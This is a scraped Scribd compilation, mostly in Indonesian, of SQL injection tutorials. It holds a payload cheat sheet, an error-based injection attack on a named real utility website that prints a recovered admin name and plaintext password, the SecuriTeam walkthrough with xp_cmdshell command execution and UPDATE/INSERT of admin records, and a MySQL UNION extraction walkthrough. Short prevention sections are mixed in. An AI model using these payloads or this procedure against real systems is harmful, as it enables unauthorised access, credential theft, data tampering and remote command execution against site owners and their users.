P. 1
SQL Injection Introduction

SQL Injection Introduction

|Views: 209|Likes:
Published by aiNey_

More info:

Published by: aiNey_ on Jan 11, 2011
Copyright:Attribution Non-commercial

Availability:

Read on Scribd mobile: iPhone, iPad and Android.
download as DOC, PDF, TXT or read online from Scribd
See more
See less

11/24/2014

pdf

text

original

http://www.binushacker.net/simple-sql-injection-tutorial.

html This information is for educational purpose only. Please use this information wisely. Udah pada tau kan soal SQL injection? Yah kalo belum baca deh Tutorialnya (dulu pernah ta buat) Itu tutorial basic, sekarang kita ke tutorial advance. Disini ga akan dibahas gimana cara inject nya tapi berbagai syntax yang bisa kita gunakan untuk menginject suatu website (jika emang bisa diinject). Oke, lets’ begin Syntax SQL Injection 1. Commenting out. Gunanya untuk mengakhiri suatu query, bypass query. + SQL Server Syntax: – Penggunaan: DROP namatabel;– + MySQL Syntax: # Penggunaan: DROP namatabel;# Contoh penggunaan in real life: * Username: admin’– * Proses query yang terjadi di server: SELECT * FROM userlist WHERE username=’admin’–’ AND password=’password’; Query ini akan memberikan km akses sebagai admin karena query selanjutnya setelah — akan diabaikan 2. Inline comment Gunanya untuk mengetahui versi SQL server yang digunakan atau untuk bypass script proteksi + SQL Server (MySQL juga bisa) Syntax: /*Comment*/ Penggunaan: DROP/*comment*/namatabel atau: DR/**/OP/*bypass proteksi*/namatabel atau: SELECT/*menghindari-spasi*/password/**/FROM/**/userlist + MySQL (mendeteksi versi) Syntax: /*!MYSQL Special SQL*/ Penggunaan: SELECT /*!32302 1/0,*/1 FROM namatabel Note: Syntax juga bisa digunakan jika versi MySQL lebih tinggi dari 3.23.02 (sesuai query), tidak berfungsi untuk versi dibawahnya

3. Staking queries Gunanya untuk menyambung 2 buah query dalam 1 transaksi. + SQL Server Syntax: ; Penggunaan: SELECT * FROM namatabel; DROP namatabel– 4. Pernyataan IF Ini kunci jika melakukan Blind SQL Injection, juga berguna untuk testing sesuatu yang ga jelas secara akurat + SQL Server Syntax: IF kondisi bagian-true ELSE bagian-false Penggunaan: IF (1=1) SELECT ‘true’ ELSE SELECT ‘false’ + MySQL Syntax: IF(kondisi,bagian-true,bagian-false) Penggunaan: SELECT IF(1=1,’true’,’false’) 5. Operasi String Gunanya untuk bypass proteksi + SQL Server Syntax: + Penggunaan: SELECT login + ‘-’ + password FROM userlist + MySQL Server Syntax: || Penggunaan: SELECT login || ‘-’ || password FROM userlist Note: Jika MySQL server dalam mode ANSI syntax berfunsi. Cara lain adalah dengan menggunakan fungsi CONCAT() dalam MySQL. Syntax: CONCAT(str1,str2,str3,…) Penggunaan: SELECT CONCAT(login,password) FROM userlist 6. Union Injection Gunanya menggabungkan 2 tabel yang berbeda dengan syarat tabel itu harus sama jumlah kolomnya. Syntax: UNION Penggunaan: ‘ UNION SELECT * FROM namatabel atau: ‘ UNION ALL SELECT * FROM namatabel atau: ‘ UNION SELECT kolom1,kolom2 FROM namatabel Proses yang terjadi dalam query: SELECT * FROM user WHERE id=’1′ UNION SELECT kolom1,kolom2 FROM namatabel Jika tabel tersebut mempunyai kolom yang berbeda, maka dapat ditambahkan null atau 1 Penggunaan: ‘ UNION SELECT 1,kolom1,kolom2 FROM namatabel

yaitu dengan cara memasukkan lewat input box dan memasukkannya lewat alamat URL. Kemudian kita cari kotak login yang untuk admin.co. Kita akan menemukan 2 model cara input parameter.pln-wilkaltim. . Tabel Admin Langkah pertama. This tutorial is for educational use only. step by step. * * No Warranty.id/sipm/admin/admin.pln-wilkaltim. 2007 http://www. Tabel News 2. Ketemu di www. Catatan : kita akan membatasi bahasan pada SQL Injection di MS-SQL Server.sekuritionline. Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection di www. anda sering mendengar istilah "SQL Injection" ? Anda tahu betapa berbahaya bug yang satu ini ? Berikut akan kita sajikan step by step SQL Injection ini. dengan cara input box.id Ada dua kelemahan di site ini. Kita ambil yang termudah dulu.php?p2_articleid=7 /********************************************************* * SQL Injection. step by step By D-and Published: April 25.. cabang biarkan aja): ' having 1=1-jangan lupa untuk menuliskan tanda kutip tunggal dan tanda minus dobel (penting). * commercial use is prohibited.id ini (lihat arsip sebelumnya).Enjoy - SQL Injection. Kita akan mengambil contoh di site www. kita inject kotak NIP dengan perintah (password terserah.co.or. * **********************************************************/ Akhir-akhir ini. kita tentukan lubang mana yang bisa di-inject dengan jalan berjalan-jalan (enumeration) dulu di site tsb.net/plugins/p2_news/printarticle. yaitu: 1.asp Langkah pertama untuk menentukan nama tabel dan fieldnya.neoteker.

line 7 -------------------Artinya itulah nama tabel dan field kedua kita. /sipm/admin/dologin.NOMOR.NIP' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.PASSWORD Lakukan langkah di atas sampai kita menemukan field terakhir. line 7 -------------------Keluarlah nama field pertama kita !!! Catat nama tabel : T_ADMIN Catat nama field : NOMOR Kemudian kita akan mencari nama field-field berikutnya.PASSWORD' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. jika kita mengecek field terakhir dengan meng-inject: . Kita inject di kotak NIP (password terserah): ' group by T_ADMIN.asp.NIP having 1=1-Akan keluar pesan error: -------------------Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'T_ADMIN.asp.NIP Kemudian kita cari field ke tiga : ' group by T_ADMIN.asp. /sipm/admin/dologin.NOMOR having 1=1-Akan keluar pesan error: -------------------Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'T_ADMIN.Kemudian akan keluar pesan error: -------------------Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'T_ADMIN. Berikut adalah pesan error yang terjadi. beserta nama tabel yang mungkin berbeda-beda. line 7 -------------------Catat field ke tiga : T_ADMIN. /sipm/admin/dologin.NOMOR' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.T_ADMIN. Catat : T_ADMIN.

NIP T_ADMIN. kita menentukan jenis struktur fieldfield tersebut di atas.ADDRESS.KD_RANTING.PASSWORD T_ADMIN. /sipm/admin/dologin.NOMOR T_ADMIN. Kita inject di kotak NIP (pass terserah) : ' union select sum(NOMOR) from T_ADMIN-Arti dari query tersebut adalah : kita coba menerapkan klausa sum sebelum menentukan apakah jumlah kolom-kolom di dua rowsets adalah sejenis. line 7 -------------------artinya kolom NOMOR berjenis numerik.NIP atau Password atau Unit Anda salah !! -------------------Sukses !!! Kita berhasil menemukan field terakhir. Berikutnya kita inject : ' union select sum(NIP) from T_ADMIN-Akan keluar pesan error : -------------------- .ADDRESS T_ADMIN. Pesan error : -------------------Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.T_ADMIN.EM AIL having 1=1-(catatan : kalimat harus 1 baris.NAMA T_ADMIN.T_ADMIN.EMAIL Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN).' group by T_ADMIN.asp. Daftar kolom (field): T_ADMIN. jadi untuk type kolom yang bukan numerik.NOMOR. T_ADMIN.T_ADMIN. ini akan mempermudah proses kita selanjutnya. tidak dipotong) -------------------.T_ADMIN. Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah) yang berlaku untuk type kolom numerik.KD_RANTING T_ADMIN.NIP.NAMA.T_ADMIN. akan keluar error yang bisa memberitahu kita jenis kolom yang dimaksud.PASSWORD. Langkah berikutnya.

untuk user admin.1 from T_ADMIN where NAMA = 'bill'-catatan : harus sebaris (tidak dipotong).1.1.1. /sipm/admin/dologin. /sipm/admin/dologin.NOMOR => numeric T_ADMIN.1.ADDRESS => nvarchar T_ADMIN. Akan keluar error : .1.asp.1 from T_ADMIN where NAMA > 'a'-artinya kita memilih minimum nama user yang lebih besar dari 'a' dan mencoba meng-konvert-nya ke tipe integer.1. kita akan mencari isi kolom password. Kita harus mengulang perintah di atas untuk kolom yang berikutnya dengan jalan mengganti nama_kolom di : ' union select sum(nama_kolom) from T_ADMIN-dengan kolom yang berikutnya.NAMA => char T_ADMIN. atau isi kolom NAMA di record yang terakhir dimasukkan.1. Akan keluar pesan error : -------------------Microsoft OLE DB Provider for ODBC Drivers (0x80040E07) [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'bill ' to a column of data type int. line 7 -------------------Anda lihat : varchar value 'bill ' 'bill' itu adalah nama user di record yang terakhir dimasukkan.PASSWORD => nvarchar T_ADMIN. Selanjutnya kita inject : ' union select min(PASSWORD). Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih kolom NAMA. dan mengabaikan 6 kolom yang lain. line 7 -------------------Artinya kolom NIP bertype char.EMAIL => char Langkah berikutnya.1.Microsoft OLE DB Provider for ODBC Drivers (0x80040E07) [Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a char data type as an argument. dengan meng-inject : ' union select min(NAMA).NIP => char T_ADMIN.1. Kita peroleh 7 type kolom: T_ADMIN.asp.KD_RANTING => char T_ADMIN.1.

Pada dasarnya berita di situ adalah isi dari tabel yang lain lagi. kita harus memasukkan parameter di alamat URL-nya... Ingat : jangan buat kerusakan ! beritahu sang admin !!! Lubang ke dua adalah pada bagian berita.asp. Kita inject-kan : ' union select min(KD_RANTING)....co. Kita inject-kan : www.. line 7 --------------------Artinya kita berhasil !!! Kita dapatkan [+] NAMA = bill [+] PASSWORD = m@mpusk@u Silahkan login ke : www.asp?id=2119' having 1=1-akan keluar pesan error : --------------------------Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'tb_news. Duarrrrrr.id/dari_Media.co.1. Setelah kita coba inject.. Contoh : www.... /sipm/admin/dologin.co...1.pln-wilkaltim.asp dengan account di atas.1. Jadi tetep bisa kita inject !!! Bedanya..pln-wilkaltim.id/sipm/admin/admin. silahkan anda isi sendiri dengan cara coba-coba Atau kita pakai jalan pintas saja..--------------------Microsoft OLE DB Provider for ODBC Drivers (0x80040E07) [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm@mpusk@u' to a column of data type int.id/dari_Media....1.NewsId' is invalid in the select list because it is not contained in an aggregate function and . Langsung masuk ke menu admin... ternyata yang berpengaruh adalah parameter id aja (CMIIW).pln-wilkaltim...1. Glhodhak. sedang nama cabang....1 from T_ADMIN where NAMA ='bill'-catatan : harus satu baris.asp?id=2119&idm=40&idSM=2 ada parameter id dan idSM.

NewsId => numeric tb_news. 3. terutama penggunaan tanda kutip tunggal (Input Validation).asp.FotoLink => tb_news. jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa di inject dengan perintah yang panjang. Extended Stored Procedures jika memungkinkan. Batasi panjang input box (jika memungkinkan).there is no GROUP BY clause. nama-nama partai di situs KPU yang di-hack oleh Shizoprenic. Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.EntryDate => datetime tb_news. line 58 --------------------------artinya 'tb_news. jadi tetep bisa dimasuki dengan cara SQL Injection ini.Title => nvarchar tb_news. Perkiraan saya. juga ada di tabel-tabel suatu database. selanjutnya adalah tugas anda sendiri untuk mengembangkan pengetahuan anda. dengan cara membatasinya di kode program. 2. Filter input yang dimasukkan oleh user. Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan. Anda bisa men-insert berita yang bisa anda tentukan sendiri isinya. Matikan fasilitas-fasilitas standar seperti Stored Procedures. /dari_Media. Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab. Ulangi langkah-langkah kita di atas sampai didapatkan : tb_news.dateagenda => datetime Nah.FotoType => bit data tb_news. 5. 4.sumber => char tb_news. ****************************************************** KHUSUS BUAT ADMIN & WEB PROGRAMMER !!! ****************************************************** Cara pencegahan yang umum digunakan : 1.NewsId' itulah nama tabel dan kolom kita yang pertama. .review => tb_news.Content => tb_news.NewsCatId => numeric tb_news.

com) MySQL .com/mysqlTutorial/mysql-php-sql-injection. This lesson will teach you how to help prevent this from happening and help you secure your scripts and MySQL statements.Yah itulah mungkin yang dapat saya ceritakan.com) [+] sql injection walktrough (www.ngssoftware. which will be used to run a SELECT statement to get their information.securiteam. MySQL & PHP Code: // a good user's name $name = "timmy".SQL Injection Prevention http://www. Kalau mau lebih aman. www. and instead of a name they give you a MySQL statement that you will unknowingly run on your database.php If you have ever taken raw user input and inserted it into a MySQL database there's a chance that you have left yourself wide open for a security issue known as SQL Injection. Hal itu adalah gambaran. copot harddisk anda...it [+] anvanced sql injection in sql server applications (www...tizag. What is SQL Injection SQL injection refers to the act of someone inserting a MySQL statement to be run on your database without your knowledge. We asked the users for their login... copot kabel jaringan anda. Injection usually occurs when you ask a user for input. like their name. jual kompie anda !!! Just kidding ) Referensi : [+] sqlinjection. . SQL Injection Example Below is a sample string that has been gathered from a normal user and a bad user trying to use SQL Injection. betapa tidak amannya dunia internet.BlackAngels. copot disk drive anda.

// our MySQL query builder really should check for injection $query_evil = "SELECT * FROM customers WHERE username = '$name_evil'". $query_bad. // the new evil injection query would include a DELETE statement echo "Injection: " . For example an attacker could empty out a table by executing a DELETE statement. echo "Normal: " . MySQL & PHP Code: $name_evil = "'. // display what the new query will look like.$query = "SELECT * FROM customers WHERE username = '$name'". // our MySQL query builder. however. Display: Normal: SELECT * FROM customers WHERE username = 'timmy' Injection: SELECT * FROM customers WHERE username = '' OR 1'' The normal query is no problem. However. . not a very safe one $query_bad = "SELECT * FROM customers WHERE username = '$name_bad'". // user input that uses SQL Injection $name_bad = "' OR 1'". $query_evil. "<br />". By using a single quote (') they have ended the string part of our MySQL query • username = ' ' and then added on to our WHERE statement with an OR clause of 1 (always true). the attacks can be a lot worse. the injection attack has actually made our query behave differently than we intended. $query . • username = ' ' OR 1 This OR clause of 1 will always be true and so every single entry in the "customers" table would be selected by this statement! More Serious SQL Injection Attacks Although the above example displayed a situation where an attacker could possibly get access to a lot of information they shouldn't have. as our MySQL statement will just select everything from customers that has a username equal to timmy. with injection echo "Injection: " . DELETE FROM customers WHERE 1 or username = '".

Display: Escaped Bad Injection: SELECT * FROM customers WHERE username = '\' OR 1\'' . this problem has been known for a while and PHP has a specially-made function to prevent these attacks. echo "Escaped Evil Injection: <br />" . $query_evil = "SELECT * FROM customers WHERE username = '$name_evil'". echo "Escaped Bad Injection: <br />" . an escaped quote \'. All you need to do is use the mouthful of a function mysql_real_escape_string. $name_bad = mysql_real_escape_string($name_bad). $query_bad . "<br />". DELETE FROM customers WHERE 1 or username = ' ' If you were run this query. DELETE FROM customers WHERE 1 or username = '". Now that you know this is a problem. $name_evil = "'. $name_evil = mysql_real_escape_string($name_evil). how can you prevent it? Injection Prevention mysql_real_escape_string() Lucky for you. it will replace those troublesome quotes(') a user might enter with a MySQLsafe substitute. $query_evil. What mysql_real_escape_string does is take a string that is going to be used in a MySQL query and return the same string with all SQL Injection attempts safely escaped. Lets try out this function on our two previous injection attacks and see how it works. Basically. MySQL & PHP Code: //NOTE: you must be connected to the database to use this function! // connect to MySQL $name_bad = "' OR 1'". $query_bad = "SELECT * FROM customers WHERE username = '$name_bad'".Display: SELECT * FROM customers WHERE username = ' '. then the injected DELETE statement would completely empty your "customers" table.

CGI.html 1 Introduction When a machine has only port 80 opened. Now all these queries will do is try to find a username that is just completely ridiculous: • • Bad: \' OR 1\' Evil: \'.com/securityreviews/5DP0N1P76E. to successfully utilize them. preventing the injection attack. etc) itself rather than on the web server or services running in the OS. We wrote the article because we .Escaped Evil Injection: SELECT * FROM customers WHERE username = '\'. and you know that the admin always patch his server. SQL injection is one of type of web hacking that require nothing but port 80 and it might just work even if the admin is patch-happy.securiteam. Zero maintenance. You have no excuse not to use it after reading this lesson! SQL Injection Walkthrough 26 May 2002 http://www. It attacks on the web application (like ASP. So please do use the handy mysql_real_escape_string() function to help prevent SQL Injection attacks on your websites. and to protect themselves from such attacks. SQL injection has been widely written and used in the wild. Full Security! www.beyondsecurity. Credit: The information has been provided by SK. DELETE FROM customers WHERE 1 or username = \'' Notice that those evil quotes have been escaped with a backslash \. PHP. This article does not introduce anything new. we have to turn to web hacking. your most trusted vulnerability scanner cannot return anything useful. DELETE FROM customers WHERE 1 or username = \' And I don't think we have to worry about those silly usernames getting access to our MySQL database.html Summary The following article will try to help beginners with grasping the problems facing them while trying to utilize SQL Injection techniques. JSP. Website Security Scan Detect hidden vulnerabilities Get guidance from professionals Code Vulnerability Test Exhaustive automated testing of internal or 3rd party code. continuous security scanning for your entire network Details SQL Injection protection is EASY! Use an External Vulnerability Scanner! Nothing to install. Network Assessment Tool Real-time.com/sql-injection.

Many web pages take parameters from web user. like: http://duck/index. search page. Therefore. 1. You may find a trick or two but please check out the "9.0 Where can I get more info?" for people who truly deserve credit for developing many techniques in SQL injection.e: login page.Pass: hi' or 1=1-- . 2. or password. With SQL Injection. web page that user name and password and make SQL query to the database to check if a user has valid name and password.2 What do you need? Any web browser.would like to document some of our pen-test using SQL injection and hope that it may be of some use to others. i. JSP. Input something like: hi' or 1=1-Into login. Example: . you can check the source code of the HTML. CGI. Try to look especially for URL that takes parameters. and look for "FORM" tag in the HTML code. or PHP web pages. HTML pages use POST command to send parameters to another ASP page. you may not see the parameters in the URL. Take for instance when a user login. You may find something like this in some HTML codes: <FORM action=Search/search.1 What if you can't find any page that takes input? You should look for pages like ASP. Sometimes.Login: hi' or 1=1-.asp method=post> <input type=hidden name=A value=C> </FORM> Everything between the <FORM> and </FORM> have potential parameters that might be useful (exploit wise).0 How do you test if it is vulnerable? Start with a single quote trick. it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else. and make SQL query to the database. 2. or even in the URL.0 What you should look for? Try to look for pages that allow you to submit data.asp?id=10 3. 1. feedback. However.1 What is SQL Injection? It is a trick to inject SQL query/command as an input possibly via web pages. etc.

'food'. 3. assume that we change the URL into something like this: http://duck/index. modify the URL and hidden field accordingly.http://duck/index.is important. our variable v_cat equals to "food' or 1=1-..asp method=post> <input type=hidden name=A value="hi' or 1=1--"> </FORM> If luck is on your side. we will have: SELECT * FROM product WHERE PCategory='food' or 1=1--' . Other than bypassing login.1 But why ' or 1=1--? Let us look at another example why ' or 1=1-. in this case. Take an asp page that will link you to another page with the following URL: http://duck/index. In order to do that. Now. 'category' is the variable name. Example: <FORM action=http://duck/Search/search.execute(sqlstr) As we can see. this is the actual code that we created for this exercise): v_cat = request("category") sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'" set rs=conn.asp?category=food' or 1=1-Now. and 'food' is the value assigned to the variable. save it in your hard disk.asp?id=hi' or 1=1-If you must do this with a hidden field. an ASP might contain the following code (OK.".asp?category=food In the URL. it is also possible to view extra information that is not normally available. just download the source HTML from the site. if we substitute this in the SQL query. our variable will be wrapped into v_cat and thus the SQL statement should become: SELECT * FROM product WHERE PCategory='food' The query should return a resultset containing one or more rows that match the WHERE condition. you will get login without any login name or password.

check if there is any packet from the server: #tcpdump icmp .2'-Try using double quote (") if single quote (') is not working. you can listen to ICMP packet from 10.10.2. which is equivalent to Administrator access in Windows. Depending on the actual SQL query. it may be possible to replace double dash with single hash "#".1.The query now should now select everything from the product table regardless if PCategory is equal to 'food' or not. The semi colon will end the current SQL query and thus allow you to start a new SQL command.0 How do I get remote execution with SQL injection? Being able to inject SQL command usually mean.10.1. exec master. which will get rid of the last hanging single quote ('). However. we can execute any SQL query at will. you may have to try some of these possibilities: ' or 1=1-" or 1=1-or 1=1-' or 'a'='a " or "a"="a ') or ('a'='a 4.xp_cmdshell to perform remote execution: '. Sometimes.. We can use stored procedures like master. if it is not an SQL server. To verify that the command executed successfully.xp_cmdshell 'ping 10. you also may try ' or 'a'='a The SQL query will now become: SELECT * FROM product WHERE PCategory='food' or 'a'='a' It should return the same result. or you simply cannot ignore the rest of the query. Default installation of MS SQL Server is running as SYSTEM.. A double dash "--" tell MS SQL server ignore the rest of the query.

TABLES" But the target IP must folder "share" sharing for Everyone. In this case. 6.sp_makewebtask "\\10. and get error message indicating permission error.asp?id=10 We will try to UNION the integer '10' with another string from the database: http://duck/index.. Take the following page for example: http://duck/index. it is possible that the administrator has limited Web User access to these stored procedures. /index.0 How to get output of my SQL query? It is possible to use sp_makewebtask to write your query into an HTML: '. When we UNION this string value to an integer 10.TABLESThis should return the first table name in the database. . which is "table1".0 How to get data from the database using ODBC error message We can use information from error message produced by the MS SQL Server to get almost any data we want.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA. we have obtained the first table name in the database. Our query: SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.asp. "SELECT * FROM INFORMATION_SCHEMA.html". MS SQL Server will try to convert a string (nvarchar) to an integer. EXEC master. It was chosen because we know it always exists.If you do not get any ping request from the server. This will produce an error. 5. The server will display the following error: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int. line 5 The error message is nice enough to tell us the value that cannot be converted into an integer. The TABLE_NAME field obviously contains the name of each table in the database.10.3\share\output.TABLES-The system table INFORMATION_SCHEMA.TABLES contains information of all tables in the server. since we cannot convert nvarchar to int.1.

asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA. /index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.1 How to mine all column names of a table? We can use another useful table INFORMATION_SCHEMA. "admin_login". we will get the first table name that matches the criteria.TABLES WHERE TABLE_NAME LIKE '%25login%25'-Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int. we can use NOT IN () to get the next column name: http://duck/index.To get the next table name.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')-- .TABLES WHERE TABLE_NAME NOT IN ('table1')-We also can search for data using LIKE keyword: http://duck/index. 6.COLUMNS WHERE TABLE_NAME='admin_login'-Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.asp. line 5 Now that we have the first column name. /index.COLUMNS to map out all columns name of a table: http://duck/index.asp.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA. line 5 The matching patent.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA. '%25login%25' will be seen as %login% in SQL Server. we can use the following query: http://duck/index. In this case.

line 5 6. line 5 We now know there is an admin user with the login name of "neo".'password'. i.e. /index.'login_name'. "password".asp. to get the password of "neo" from the database: http://duck/index. /index.2 How to retrieve any data we want? Now that we have identified some important tables. We know this when we get the following error message: http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'-- . "details".asp. Finally.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id'.asp. let's get the first login_name from the "admin_login" table: http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA. Now. line 5 When we continue further. we obtained the rest of the column name. /index.Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int. we can use the same technique to gather any information we want from the database.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login-Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.details')-Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator. and their column.

Let us try this query instead: http://duck/index. .asp?id=10 UNION SELECT TOP 1 convert(int. (ASSCII code for '+' = 0x2b). We will append '(space)morpheus' into the actual password. even if we have a numeric string '31173'. SQL server will not throw ODBC error message. Since it is a valid UNION statement. /index. To solve this problem. we will not be able to retrieve any numeric entry. password%2b'%20morpheus') FROM admin_login where login_name='trinity'-We simply use a plus sign (+) to append the password with any text we want.3 How to get numeric string value? There is limitation with the technique describe above. /index. The reason being.Output: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int. SQL Server will throw out ODBC error message: Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int. you can even login as 'trinity' with the password '31173'. trying to convert '31173 morpheus' into an integer.asp. before UNION with an integer (10 in this case).asp.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'-We will probably get a "Page Not Found" error. 6. the password "31173" will be converted into a number. line 5 We can now login as "neo" with his password "m4trix". and thus. By manually calling the convert() function. Let say we are trying to get password of "trinity" which is "31173": http://duck/index. we can append the numeric string with some alphabets to make sure the conversion fail. We cannot get any error message if we are trying to convert text that consists of valid number (character between 0-9 only). Therefore. it will become '31173 morpheus'. line 5 Now.

slash.wiretrip.org/asac/input_validation/sql. double quote. in all strings from: . semi colon.. sp_makewebtask 9. For example. http://www. to change password for "neo": http://duck/index. new line. Delete stored procedures that you are not using like: master. xp_sendmail.asp?id=42&iface=6 Great article on gathering information from ODBC error messages: http://www.com/presentations/win-usa01/Litchfield/BHWin01Litchfield. convert it to an integer before parsing it into SQL statement.Parameters from URL .Input from users . 'login_name'.'NA')-We can now login as "neo2" with the password of "newpas5". etc. back slash.blackhat. Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab. 'details') VALUES (666.owasp. UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'-To INSERT a new record into the database: http://duck/index.'newpas5'.asp?id=10.net/rfp/p/doc.0 How to update/insert data into the database? When we successfully gather all column name of a table.'neo2'.Values from cookie For numeric value.asp?id=10.0 How to avoid SQL Injection? Filter out character like single quote.doc A good summary of SQL Injection on various SQL Server on http://www. 'password'.7. it is possible for us to UPDATE or even INSERT a new record in the table.shtml .0 Where can I get more info? One of the earliest works on SQL Injection we have encountered should be the paper from Rain Forest Puppy about how he hacked PacketStorm. extended character like NULL. Or using ISNUMERIC to make sure it is an integer. xp_startmail.Xp_cmdshell. 8. carry return. INSERT INTO 'admin_login' ('login_id'.

9 from information_schema.7.sensepost.php?id=1 union all select 0 from information_schema.com/vuln.2.Senseport's article on reading SQL Injection: http://www.4.php?id=1 order by 9/* tidak eror http://site.com/2008/11/21/cara-sederhana-sql-injection-mysql-v5/ Cara Sederhana sql injection MySQL v5 | ————————————– author: Andr3^81 email: andr3-81 [at] linuxmail [dot] org http://site.wiretrip.htm Other worth readings: http://www.8.net/rfp/p/doc.com/whitepapers/WhitepaperSQLInjection.7.asp?id=7&iface=6 http://www.5.php?id=-1 union all select 1.com/vuln.com/misc/SQLinsertion.5.net/wargames01/IOWargames.pdf Cara Sederhana sql injection MySQL v5 http://andr381.com/vuln.5.php?id=1 union all select 0 from admin didapat nama databasenya bego http://site.9 from information_schema.wiretrip.tables belum berhasil kita cari jumlah kolomnya http://site.8.9 from .ppt http://www.table_name.asp?id=60&iface=6 http://www.4.com/vuln.com/vuln.wordpress.2.8.com/vuln. angka 3 kita ganti dengan table_name http://site.6.7.php?id=1 union all select 1.net/rfp/p/doc.spidynamics.digitaloffense.3.error kita coba cari nama databasenya http://site.3.com/vuln.php?id=-1 union all select 1.6.6.tables/* didapat angka 3 untuk mencari nama tabelnya.com/vuln.2.tables/* tidak didapat apa2 tambahkan (-) didepan belakang (=) http://site.4.php?id=1 order by 10/* eror maka diambil kesimpulan kolomnya berjumlah 9 http://site.php?id=1′ <.

4.6.8.5.7.php?id=-1 union all select 1.com/vuln.8.4.2.php?id=-1 union all select 1.9 from information_schema.com/vuln.9 from information_schema.6.6.7.8.7.tables where table_schema=’bego’/* didapat nama tabel tblArsip untuk mencari nama2 tabel lainnya kita gunakan limit 1.5.9 from information_schema.2.9 from information_schema.6.7.php?id=-1 union all select 1.6.9 from information_schema.4.table_name.7.5.1/* http://site.7. UserPass.8.6.1 http://site.information_schema.9 from information_schema.8.4.com/vuln.1/* sampe gak ada lagi tanda yang muncul di monitor misalkan kita mendapatkan nama tabelnya adalah tblUser sekarang kita akan mencari nama2 kolomnya untuk mencari nama tabelnya.5.com/vuln.1/* http://site.1/* http://site. UserMail setelah dapat nama kolom dan tabelnya kita masukkan http://site.8.column_name.com/vuln.table_name.com/vuln. angka 3 kita ganti dengan column_name http://site.tables where table_schema=’bego’ limit 4.1/* http://site.1 http://site.6. UserLogin.com/vuln.4.6.com/vuln.2.8.php?id=-1 union all select 1.2.2.9 from information_schema.php?id=-1 union all select 1.UserLogin.1/* didapat nama kolom UserName.2.9 from tblUser didapat loginnya admin didapat passnya 1234 tinggal kita cari halaman admin misalnya kita temukan http://site.5.8.4.column_name.com/vuln.4.1/* http://site.6.7.table_name.5.6.7.6.2.column_name.tables where table_schema=’bego’ limit 2.5.columns where table_name=’tblUser’ limit 3.4.php?id=-1 union all select 1.5.columns where table_name=’tblUser’ limit 1.4.9 from information_schema.9 from tblUser http://site.9 from information_schema.php?id=-1 union all select 1.com/vuln.php?id=-1 union all select 1.com/vuln.5.1/* http://site.columns where table_name=’tblUser’/* didapat nama kolomnya UserName untuk mencari nama2 kolom lainnya kita gunakan limit 1.5.column_name.7.tables where table_schema=’bego’ limit 1.php tinggal kita masukkan aja loginnya:admin passwordnya:1234 .column_name.columns where table_name=’tblUser’ limit 2.tables where 